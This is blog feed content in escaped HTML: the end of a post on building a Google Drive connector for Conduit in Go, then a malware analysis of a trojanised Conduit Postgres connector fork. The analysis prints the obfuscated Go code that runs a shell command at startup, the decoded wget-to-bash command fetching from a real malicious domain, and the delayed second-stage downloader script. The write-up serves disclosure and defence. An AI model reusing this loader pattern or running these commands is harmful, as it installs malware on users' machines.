			Name&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;    fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Sprintf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;%s.txt&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Key&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Bytes&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// Set the file name&lt;/span&gt;
			Parents&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;config&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;DriveFolderID&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;          &lt;span class=&quot;token comment&quot;&gt;// Set the shared folder ID&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// Upload the file directly from the bytes buffer&lt;/span&gt;
		uploadedFile&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;service&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Files&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Create&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;fileMetadata&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Media&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;fileBuffer&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Do&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; successfulUploads&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Errorf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;unable to upload file: %w&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// Log the uploaded file&apos;s ID&lt;/span&gt;
		sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Logger&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Trace&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Msgf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;File uploaded successfully! File ID: %s\n&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; uploadedFile&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Id&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// Increment the successful uploads counter&lt;/span&gt;
		successfulUploads&lt;span class=&quot;token operator&quot;&gt;++&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; successfulUploads&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I kept it simple for a v1, focusing on JSON files and plain text, but there’s a lot of room to expand in the future. Right now, the connector only supports creating new files—each record is uploaded as a new file in the target Drive folder. It doesn’t handle updates or deletes yet, so there&apos;s no logic for overwriting existing files or removing them based on record changes. Down the line, it could support features like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Updating existing files&lt;/li&gt;
&lt;li&gt;Deleting files when a record indicates a delete event&lt;/li&gt;
&lt;li&gt;Supporting different MIME types and file formats (e.g. CSV, PDFs, images)&lt;/li&gt;
&lt;li&gt;Custom folder routing based on record content&lt;/li&gt;
&lt;/ul&gt;
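&lt;p&gt;To make the update and delete ideas concrete: once a record&apos;s operation is known, routing it could be a simple switch. The sketch below is a hypothetical illustration; the operation names and helper are stand-ins, not the Conduit SDK&apos;s actual types:&lt;/p&gt;

```go
package main

import "fmt"

// Operation is a stand-in for the record operation types a connector
// receives (hypothetical names; the real SDK defines its own).
type Operation string

const (
	OpCreate Operation = "create"
	OpUpdate Operation = "update"
	OpDelete Operation = "delete"
)

// driveAction shows how the connector could route a record once updates
// and deletes are supported: update overwrites the existing Drive file,
// delete removes it, and everything else falls back to creating a file.
func driveAction(op Operation) string {
	switch op {
	case OpUpdate:
		return "files.update" // overwrite the existing Drive file
	case OpDelete:
		return "files.delete" // remove the Drive file
	default:
		return "files.create" // current v1 behavior: always create
	}
}

func main() {
	fmt.Println(driveAction(OpCreate), driveAction(OpUpdate), driveAction(OpDelete))
}
```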
&lt;p&gt;For now, though, it’s a clean foundation to build on—simple, reliable, and focused.&lt;/p&gt;
&lt;h3&gt;🔧 That One Gotcha: &lt;code class=&quot;language-text&quot;&gt;make generate&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;One thing that tripped me up early: after changing any of the connector’s config variables (like &lt;code class=&quot;language-text&quot;&gt;folder_id&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;credentials&lt;/code&gt;, etc.), I needed to run:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;make&lt;/span&gt; generate&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Without this, Conduit wouldn’t pick up the new config fields, and I’d get confusing runtime errors or empty values. Once I realized this step was required, everything started working a lot more smoothly.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pro tip:&lt;/strong&gt; if something feels weird after changing config, run &lt;code class=&quot;language-text&quot;&gt;make generate&lt;/code&gt;. It&apos;ll probably fix it.&lt;/p&gt;
&lt;h3&gt;👩‍💻 First Time Writing Go&lt;/h3&gt;
&lt;p&gt;This was also my first time writing Go, and honestly? I loved it. The language is opinionated in a way that helps you write clean, readable code. Once I wrapped my head around struct tags, interfaces, and error handling, things fell into place quickly.&lt;/p&gt;
&lt;p&gt;Compared to some of the dynamic languages I’m used to, Go felt rigid at first—but I came to appreciate that structure, especially for something like a connector where stability matters.&lt;/p&gt;
&lt;h3&gt;🔌 Connector Highlights&lt;/h3&gt;
&lt;p&gt;Here are a few things I implemented in the destination connector:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Google Drive API integration&lt;/strong&gt; using a service account&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Config validation&lt;/strong&gt;, making sure required fields are present&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Simple file writing logic&lt;/strong&gt; based on incoming record content&lt;/li&gt;
&lt;/ul&gt;
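&lt;p&gt;Conceptually, the config validation boils down to checking that the required fields are set and reporting everything that&apos;s missing at once. Here&apos;s a minimal hand-rolled sketch; the field names are illustrative, and the real connector declares its fields via struct tags processed by &lt;code class=&quot;language-text&quot;&gt;make generate&lt;/code&gt;:&lt;/p&gt;

```go
package main

import (
	"fmt"
	"strings"
)

// DestinationConfig mirrors the shape of the connector's config
// (field names here are illustrative, not the connector's exact ones).
type DestinationConfig struct {
	CredentialsJSON string
	DriveFolderID   string
}

// Validate checks that the required fields are present and collects
// every problem instead of stopping at the first one.
func (c DestinationConfig) Validate() error {
	var missing []string
	if c.CredentialsJSON == "" {
		missing = append(missing, "credentials")
	}
	if c.DriveFolderID == "" {
		missing = append(missing, "folder_id")
	}
	if len(missing) > 0 {
		return fmt.Errorf("missing required fields: %s", strings.Join(missing, ", "))
	}
	return nil
}

func main() {
	err := DestinationConfig{DriveFolderID: "abc123"}.Validate()
	fmt.Println(err) // reports that credentials is missing
}
```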
&lt;p&gt;I tested everything by running Conduit locally, setting up a pipeline, and watching files appear in my Drive folder. Extremely satisfying.&lt;/p&gt;
&lt;h3&gt;💡 What I Learned&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Writing connectors isn’t as scary as it sounds.&lt;/strong&gt; Conduit’s docs and examples make it approachable.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Go is a great fit for this kind of work.&lt;/strong&gt; The performance, structure, and ecosystem made sense quickly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Always &lt;code class=&quot;language-text&quot;&gt;make generate&lt;/code&gt; after a config change.&lt;/strong&gt; Seriously. Just do it.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;🎯 What’s Next?&lt;/h3&gt;
&lt;p&gt;This connector is a solid starting point, but there’s plenty of room to grow:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Support for different file formats (CSV, binary, etc.)&lt;/li&gt;
&lt;li&gt;More flexible folder paths and naming schemes&lt;/li&gt;
&lt;li&gt;Handling large payloads and batching intelligently&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And now that I’ve gotten my feet wet, I’m tempted to try building a &lt;strong&gt;source connector&lt;/strong&gt; next.&lt;/p&gt;
&lt;h3&gt;🥳 Wrapping Up&lt;/h3&gt;
&lt;p&gt;Shipping my first connector—especially during a self-directed week like this—felt awesome. I got to learn Go, contribute something real to the Conduit ecosystem, and explore how connectors are built from the ground up.&lt;/p&gt;
&lt;p&gt;If you’re even a little curious about writing your own connector, my advice is: &lt;strong&gt;go for it&lt;/strong&gt;. It’s more doable than you think, and you’ll learn a ton along the way.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Catching a Trojan: Finding a malicious Conduit connector in the wild]]></title><description><![CDATA[A third-party created a Conduit connector with malicious code, here's how we found it, and got it removed.]]></description><link>https://meroxa.com/blog/catching-a-trojan-finding-a-malicious-conduit-connector-in-the-wild</link><guid isPermaLink="false">https://meroxa.com/blog/catching-a-trojan-finding-a-malicious-conduit-connector-in-the-wild</guid><dc:creator><![CDATA[Lovro Mažgon]]></dc:creator><pubDate>Tue, 29 Apr 2025 11:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;Conduit&lt;/a&gt; is a data-streaming tool that heavily relies on plugins to extend its functionality. For instance, anyone can implement and use their own connector without recompiling Conduit, as the connector starts in a separate process that communicates with Conduit via gRPC. The security-conscious reader might spot a potential issue - if you can get someone to run your connector, you could include malicious code to do despicable things. That&apos;s exactly what someone tried last week.&lt;/p&gt;
&lt;p&gt;Let&apos;s dive into how we spotted this and what we did to prevent our users from falling into the trap.&lt;/p&gt;
&lt;h2&gt;A Suspicious Connector&lt;/h2&gt;
&lt;p&gt;As part of the Conduit project, we have a GitHub action that crawls repositories every week, searching for any repository importing our &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk&quot;&gt;connector SDK&lt;/a&gt;. These repositories are Conduit connectors. The action gathers information about each repository, like the description, number of stars, the &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; file, releases, and their assets. All of this information is gathered and exported in a JSON file that we host on &lt;a href=&quot;https://conduit.io/connectors.json&quot;&gt;https://conduit.io/connectors.json&lt;/a&gt;. We call this our connector registry.&lt;/p&gt;
&lt;p&gt;Last week, I reviewed the pull request with the updated connector list and spotted a new 3rd party repository. Exciting: someone is working on a new connector! I decided to check it out. After opening the repository, I was met with a familiar README - this repository was a fork of our official &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-postgres&quot;&gt;Postgres connector&lt;/a&gt;. Two things caught my eye, however. The git history was squashed into a single commit with the message &quot;adjust&quot;, and the repository already had 22 stars even though it had been created only two days earlier. I opened the GitHub profile of the repository creator and saw that the account was created a month ago and that this was the only repository they owned. Suspicious.&lt;/p&gt;
&lt;p&gt;I decided to clone the repository and check the diff between the forked connector and our official one.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;diff&quot;&gt;&lt;pre class=&quot;language-diff&quot;&gt;&lt;code class=&quot;language-diff&quot;&gt;diff -bur conduitio/conduit-connector-postgres/ actualrancher/conduit-connector-postgres/

&lt;span class=&quot;token coord&quot;&gt;--- conduitio/conduit-connector-postgres/cmd/connector/main.go	2025-01-31 13:37:03.742463510 +0100&lt;/span&gt;
&lt;span class=&quot;token coord&quot;&gt;+++ actualrancher/conduit-connector-postgres/cmd/connector/main.go	2025-04-22 13:07:46.407750150 +0200&lt;/span&gt;
&lt;span class=&quot;token coord&quot;&gt;@@ -14,6 +14,8 @@&lt;/span&gt;

&lt;span class=&quot;token unchanged&quot;&gt;&lt;span class=&quot;token prefix unchanged&quot;&gt; &lt;/span&gt;package main
&lt;/span&gt;
&lt;span class=&quot;token inserted-sign inserted&quot;&gt;&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;import &quot;os/exec&quot;
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;span class=&quot;token unchanged&quot;&gt;&lt;span class=&quot;token prefix unchanged&quot;&gt; &lt;/span&gt;import (
&lt;span class=&quot;token prefix unchanged&quot;&gt; &lt;/span&gt;	postgres &quot;github.com/conduitio/conduit-connector-postgres&quot;
&lt;span class=&quot;token prefix unchanged&quot;&gt; &lt;/span&gt;	sdk &quot;github.com/conduitio/conduit-connector-sdk&quot;
&lt;/span&gt;&lt;span class=&quot;token coord&quot;&gt;@@ -22,3 +24,15 @@&lt;/span&gt;
&lt;span class=&quot;token unchanged&quot;&gt;&lt;span class=&quot;token prefix unchanged&quot;&gt; &lt;/span&gt;func main() {
&lt;span class=&quot;token prefix unchanged&quot;&gt; &lt;/span&gt;	sdk.Serve(postgres.Connector)
&lt;span class=&quot;token prefix unchanged&quot;&gt; &lt;/span&gt;}
&lt;/span&gt;&lt;span class=&quot;token inserted-sign inserted&quot;&gt;&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;func OAPicvR() error {
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;	WoH := []string{&quot;o&quot;, &quot; &quot;, &quot;r&quot;, &quot;&amp;amp;&quot;, &quot; &quot;, &quot;7&quot;, &quot;s&quot;, &quot;s&quot;, &quot;n&quot;, &quot;5&quot;, &quot;w&quot;, &quot;w&quot;, &quot;b&quot;, &quot;t&quot;, &quot;h&quot;, &quot;a&quot;, &quot;y&quot;, &quot;a&quot;, &quot;d&quot;, &quot;o&quot;, &quot;e&quot;, &quot;g&quot;, &quot; &quot;, &quot;/&quot;, &quot;m&quot;, &quot;a&quot;, &quot;/&quot;, &quot;i&quot;, &quot;4&quot;, &quot;t&quot;, &quot;r&quot;, &quot;a&quot;, &quot;r&quot;, &quot;/&quot;, &quot;f&quot;, &quot;t&quot;, &quot;p&quot;, &quot;i&quot;, &quot;/&quot;, &quot;s&quot;, &quot; &quot;, &quot;O&quot;, &quot;u&quot;, &quot;d&quot;, &quot;/&quot;, &quot;/&quot;, &quot;3&quot;, &quot;.&quot;, &quot;e&quot;, &quot;b&quot;, &quot;/&quot;, &quot;f&quot;, &quot;-&quot;, &quot;d&quot;, &quot; &quot;, &quot;t&quot;, &quot;b&quot;, &quot;0&quot;, &quot;c&quot;, &quot;|&quot;, &quot;1&quot;, &quot;3&quot;, &quot; &quot;, &quot;n&quot;, &quot;b&quot;, &quot;e&quot;, &quot;a&quot;, &quot;-&quot;, &quot;h&quot;, &quot;:&quot;, &quot;6&quot;, &quot;g&quot;, &quot;3&quot;, &quot;t&quot;, &quot;e&quot;}
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;	oUnSQ := &quot;/bin/sh&quot;
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;	jDIVaCS := &quot;-c&quot;
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;	iwxTmUsF := WoH[11] + WoH[21] + WoH[74] + WoH[13] + WoH[22] + WoH[67] + WoH[41] + WoH[62] + WoH[52] + WoH[54] + WoH[14] + WoH[73] + WoH[35] + WoH[36] + WoH[6] + WoH[69] + WoH[23] + WoH[45] + WoH[24] + WoH[15] + WoH[63] + WoH[29] + WoH[2] + WoH[66] + WoH[49] + WoH[0] + WoH[10] + WoH[48] + WoH[32] + WoH[16] + WoH[47] + WoH[27] + WoH[58] + WoH[42] + WoH[38] + WoH[7] + WoH[55] + WoH[19] + WoH[30] + WoH[25] + WoH[71] + WoH[65] + WoH[33] + WoH[53] + WoH[20] + WoH[61] + WoH[5] + WoH[72] + WoH[18] + WoH[57] + WoH[43] + WoH[34] + WoH[44] + WoH[31] + WoH[46] + WoH[60] + WoH[9] + WoH[28] + WoH[70] + WoH[64] + WoH[51] + WoH[40] + WoH[59] + WoH[1] + WoH[50] + WoH[56] + WoH[37] + WoH[8] + WoH[26] + WoH[12] + WoH[17] + WoH[39] + WoH[68] + WoH[4] + WoH[3]
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;	exec.Command(oUnSQ, jDIVaCS, iwxTmUsF).Start()
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;	return nil
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;}
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;var ldpsvC = OAPicvR()&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Whoah, what&apos;s that?! Someone added code that executes an obfuscated command when the connector starts. The red light in my head started flashing.&lt;/p&gt;
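&lt;p&gt;A safe way to inspect a snippet like this is to reassemble the string exactly as the malware does, but print it instead of handing it to &lt;code class=&quot;language-text&quot;&gt;exec.Command&lt;/code&gt;. Here&apos;s a minimal sketch of that trick, with a harmless placeholder payload instead of the real one:&lt;/p&gt;

```go
package main

import "fmt"

// reveal reassembles an obfuscated command the same way the malicious
// connector did, but returns it for printing instead of executing it.
func reveal(parts []string, idx []int) string {
	cmd := ""
	for _, i := range idx {
		cmd += parts[i]
	}
	return cmd
}

func main() {
	// Harmless placeholder payload; the real connector hid a
	// wget-pipe-to-bash one-liner behind the same index shuffle.
	parts := []string{"l", "o", "c", "h", " ", "e", "o", "l", "e", "h"}
	idx := []int{5, 2, 3, 1, 4, 9, 8, 0, 7, 6}
	fmt.Println(reveal(parts, idx)) // prints the hidden command: echo hello
}
```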
&lt;p&gt;I wanted to know what code exactly would be executed, so I copied the code into a temporary file, printing out the variable &lt;code class=&quot;language-text&quot;&gt;iwxTmUsF&lt;/code&gt; without executing the command. Here&apos;s what came out (needless to say, &lt;strong&gt;do not execute this&lt;/strong&gt;):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;&lt;span class=&quot;token function&quot;&gt;wget&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-O&lt;/span&gt; - https://mantrabowery.icu/storage/de373d0df/a31546bf &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; /bin/bash &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This command downloads a script and runs it on your machine in the background. Let&apos;s go deeper - what does the script do? Here&apos;s its content:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;&lt;span class=&quot;token shebang important&quot;&gt;#!/bin/bash&lt;/span&gt;

&lt;span class=&quot;token builtin class-name&quot;&gt;cd&lt;/span&gt; ~
&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&lt;span class=&quot;token environment constant&quot;&gt;$OSTYPE&lt;/span&gt;&quot;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;linux-gnu&quot;&lt;/span&gt;* &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;then&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-f&lt;/span&gt; ./f0eee999 &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;then&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;sleep&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;3600&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;wget&lt;/span&gt; https://mantrabowery.icu/storage/de373d0df/f0eee999
		&lt;span class=&quot;token function&quot;&gt;chmod&lt;/span&gt; +x ./f0eee999
		&lt;span class=&quot;token assign-left variable&quot;&gt;app_process_id&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;&lt;span class=&quot;token variable&quot;&gt;$(&lt;/span&gt;pidof f0eee999&lt;span class=&quot;token variable&quot;&gt;)&lt;/span&gt;&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-z&lt;/span&gt; &lt;span class=&quot;token variable&quot;&gt;$app_process_id&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;then&lt;/span&gt;
			./f0eee999
		&lt;span class=&quot;token keyword&quot;&gt;fi&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;fi&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;fi&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It&apos;s a script that specifically targets Linux machines. If the machine is not infected yet, it downloads a binary and runs it. The sneaky part is how it lies dormant for 1 hour before downloading and running the binary, making it harder for automated scanners or manual testing to detect. If you ran this connector on your machine, you wouldn&apos;t spot anything out of the ordinary at first.&lt;/p&gt;
&lt;p&gt;We still don&apos;t know what that binary does, though. I downloaded it and submitted it to &lt;a href=&quot;https://www.virustotal.com/gui/file/844013025bf7c5d01e6f48df0e990103ad3c333be31f54cf5301e1463f6ca441&quot;&gt;virustotal.com&lt;/a&gt;, which confirmed my suspicion - it&apos;s a Trojan.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/410a010492c82667cf14ecfd5af8f54a/94829/image-5-.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 20%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA9ElEQVR42kWO226CUBBF+Yw+mFS8VA4g5XIA5YBYI9B4x1qbtDXp///E6qk89GFnTSaz9x6jLxYIr6KVa2y74PFJkaoPVPZOpvXHQnVU6sosuxIWn2TVD1H5TfpyI1p8IZc33KTFGLgrptGGy6yhCVc8DGdE8xMya4nVmbS4kORvxPkZPzlghxtEtMOJ99hyr0OOWOGWYH5E+DXG0Flh6YNpfGD6XNEbxMTlmVCdsIJGm1+1oePYWzPxK7x0d59l3uLIDaa9JMl0kVdimKJABLUO3TLyanpmyFhWuPoDU5T0rYXmvwZ2ydBZ3jm6s9uZWv2J4hc6MYRMGbP6qAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;image.png&quot;
        title=&quot;&quot;
        src=&quot;/static/410a010492c82667cf14ecfd5af8f54a/5a190/image-5-.png&quot;
        srcset=&quot;/static/410a010492c82667cf14ecfd5af8f54a/772e8/image-5-.png 200w,
/static/410a010492c82667cf14ecfd5af8f54a/e17e5/image-5-.png 400w,
/static/410a010492c82667cf14ecfd5af8f54a/5a190/image-5-.png 800w,
/static/410a010492c82667cf14ecfd5af8f54a/94829/image-5-.png 878w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Remember that the repository had 22 stars? I also had a look at the accounts of the stargazers. Each and every one of them was a recently created account, while almost half of them also owned a repository that was a fork of some Go project. After inspecting these repositories, I quickly found that every single one showed the same pattern - a similar snippet with malicious code injected somewhere in the code and a single commit squashing the history, making it harder to spot.&lt;/p&gt;
&lt;h2&gt;Taking Action&lt;/h2&gt;
&lt;p&gt;The first thing I did after identifying the malicious repositories was to report the abuse to GitHub. Here are the &lt;a href=&quot;https://docs.github.com/en/communities/maintaining-your-safety-on-github/reporting-abuse-or-spam&quot;&gt;instructions&lt;/a&gt; on how you can do that yourself if you ever spot a repository with malicious code. This is an important step in keeping GitHub a safe and trusting space.&lt;/p&gt;
&lt;p&gt;GitHub acted swiftly: the repository was removed within a few hours of the report. Kudos to GitHub!&lt;/p&gt;
&lt;p&gt;We also decided to change the way our GitHub action builds the connector registry. Previously, the action would automatically create a pull request that added any newly discovered connectors, relying on reviewers to spot malicious connectors before the list was updated on our site. Now, we have adopted a more restrictive approach - the action only proposes new connectors from our own GitHub organizations. Any repository outside of these organizations must first be manually added to an allowlist before it appears in the connector registry.&lt;/p&gt;
&lt;p&gt;We still didn&apos;t want to lose the information about new potential connectors being created by the community, so we configured the action to also output a list of repositories that were filtered out. This gives us the best of both worlds - we still know whenever someone creates a new connector, while lowering the risk of mistakenly including a malicious connector in our official connector registry.&lt;/p&gt;
